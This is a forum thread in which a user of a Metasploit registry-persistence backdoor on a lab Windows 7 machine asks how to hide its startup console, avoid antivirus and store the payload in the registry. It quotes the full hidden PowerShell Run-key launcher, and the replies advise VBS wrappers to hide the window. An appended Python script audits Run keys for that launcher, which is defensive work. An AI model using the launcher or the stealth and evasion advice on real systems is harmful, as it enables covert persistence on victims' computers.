
Metasploit Persistence - Can't hide CMD prompt on startup


Vurraz


Hello,

I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine.

I wish to completely hide that shell on startup, to make the backdoor stealthy.

 

I tried tinkering with the options in the registry key, but it didn't help. 

This is the data written to the registry key of the backdoor by default: (HKCU/Software/Microsoft/Windows/CurrentVersion/Run)

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))"

I'm testing this on Windows 7 Enterprise.


The problem with most Windows backdoors (including reverse shells) is that they need the window open to function. Your best bet is going to be to try and hide that window, so I've linked some Stack Exchange answers that explain how to do exactly that below. Most of these involve making the script into a VBS object, which by default runs in the background on Windows systems.

Answer #1

Answer #2


Thank you so much. This worked. No window is seen. I'm so grateful.

 

I created invisible.vbs, which runs together with something.bat. The bat file is the reg key command (%COMSPEC%...).

But now it seems that I will have to edit the registry_persistence.rb exploit to automatically upload invis.vbs and something.bat to the victim PC to make this work... Is this going to trigger the antivirus? What about Avast?

Do you have a cleaner solution in mind, instead of uploading 2 files to the victim?

Is it possible to write the .vbs and .bat source code DIRECTLY into the registry key, so that no file needs to be uploaded? If so, please show me how.

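Seen from the defending side, the Run-key launcher quoted in the first post has a recognisable shape: a cmd.exe wrapper that starts a minimised PowerShell with no profile and a hidden window, which then decodes a Base64 payload it reads from a second registry value and runs it with iex. The script below is an added example (not from this thread, Metasploit, or any answer linked above) that audits HKCU Run values for that combination of traits and extracts the key and value name the second stage is stored in; the indicator list, the threshold and the three sample entries are constructed for illustration.

```python
import re

# Constructed sample of HKCU\Software\Microsoft\Windows\CurrentVersion\Run values
# (value name -> command); the "Updater" entry is the launcher quoted in the thread.
SAMPLE_RUN_VALUES = {
    "OneDrive": r'"C:\Users\lab\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Backup": r'powershell.exe -File "C:\Scripts\backup.ps1"',
    "Updater": r'''%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))"''',
}

# One indicator per trait of that launcher; legitimate Run entries rarely show more than one.
INDICATORS = [
    ("cmd_start_min", re.compile(r"%COMSPEC%.*\bstart\s+/b", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("inline_eval", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("base64_stage", re.compile(r"frombase64string", re.I)),
    ("registry_stage", re.compile(r"get-item\s+'?HK(?:CU|LM|U):", re.I)),
]
# Registry key and value name the launcher pulls its second stage from.
STAGE_RX = re.compile(r"Get-Item\s+'([^']+)'\)\.GetValue\('([^']+)'\)", re.I)


def scan_run_value(name, command):
    hits = [label for label, rx in INDICATORS if rx.search(command)]
    m = STAGE_RX.search(command)
    return {"name": name, "score": len(hits), "indicators": hits,
            "stage_key": m.group(1) if m else None,
            "stage_value": m.group(2) if m else None}


def scan_run_values(values, threshold=3):
    """Findings for every Run entry carrying at least `threshold` indicators."""
    results = [scan_run_value(n, c) for n, c in values.items()]
    return [r for r in results if r["score"] >= threshold]


def read_live_run_values():
    """Current user's Run values on a Windows host; {} where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return {}
    values = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        for i in range(winreg.QueryInfoKey(key)[1]):  # [1] is the number of values under the key
            name, data, _ = winreg.EnumValue(key, i)
            values[name] = str(data)
    return values
```

On a Windows host, `scan_run_values(read_live_run_values())` checks the real key instead of the sample; treat the score as a triage signal to investigate, not a verdict, and review the extracted stage key by hand.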
